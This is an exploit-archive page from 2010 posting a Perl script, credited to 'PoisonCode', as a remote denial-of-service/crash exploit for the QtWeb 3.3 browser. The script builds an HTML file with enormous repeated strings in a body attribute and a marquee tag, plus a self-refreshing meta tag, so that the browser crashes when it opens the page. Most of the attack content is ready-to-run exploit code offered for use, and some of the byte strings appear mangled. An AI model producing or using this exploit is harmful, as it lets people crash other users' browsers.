QtWeb 3.3 Remote DoS / Crash Exploit
Posted on 03 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>QtWeb 3.3 Remote DoS / Crash Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================== QtWeb 3.3 Remote DoS / Crash Exploit ==================================== # Title:QtWeb 3.3 Remote DoS/Crash Exploit # Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable: http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Platform:Windows _____ _____ _ _ | __ / ____| (_) | | |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ | ___/ \___ / _ / __| | | | '__| | __| | | | | | ____) | __/ (__| |_| | | | | |_| |_| | |_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | __/ | |___/ Exploit ---------------- #!/usr/bin/perl # File Name :QtWeb 3.3 Remote DoS/Crash Exploit # Vuln :Remote Dos/Crash # Author :PoisonCode # Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit # Date:02/06/2010 # Author:PoisonCode # Site :http://www.qtweb.net/ # Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable:http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Tested on: Windows $file="Exploit QtWeb 3.3.html"; print " ====================================== "; print " = QtWeb 3.3 Remote DoS/Crash Exploit = "; print " = Autor:PoisonCode = "; print " = Web :PanamaSecurity.blogspot.com = "; print " ====================================== "; print " "; print " Espere Mientras se Genera el Exploit "; my $a="x55" x 100000000; my $b="85" x 55900000; my $c="x7Cx95x64xAEx00x96xbdx40x00x098a86x5Ax65x72x30x0x54x68x75x6Ex64x65x72"; open(myfile,">>$file"); print myfile "<html>"; print myfile "<title>PanamaSecurity - PoisonCode $c </title>"; print myfile '<head><meta http-equiv="refresh" content="0; url=Exploit QtWeb3.3.html"></head>'; print myfile "<body alink="; print myfile $a,$b,$c; print myfile "<marquee>$a,$b,$c</marquee>"; print myfile '">'; print myfile "</html>"; close(myfile); print " "; print " Nombre del Archivo : $file "; print " Se Ha Creado El Exploit Correctamente "; print " "; print "---------------------------------------------------------------------- "; print " Visiten : PanamaSecurity.blogspot.com "; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>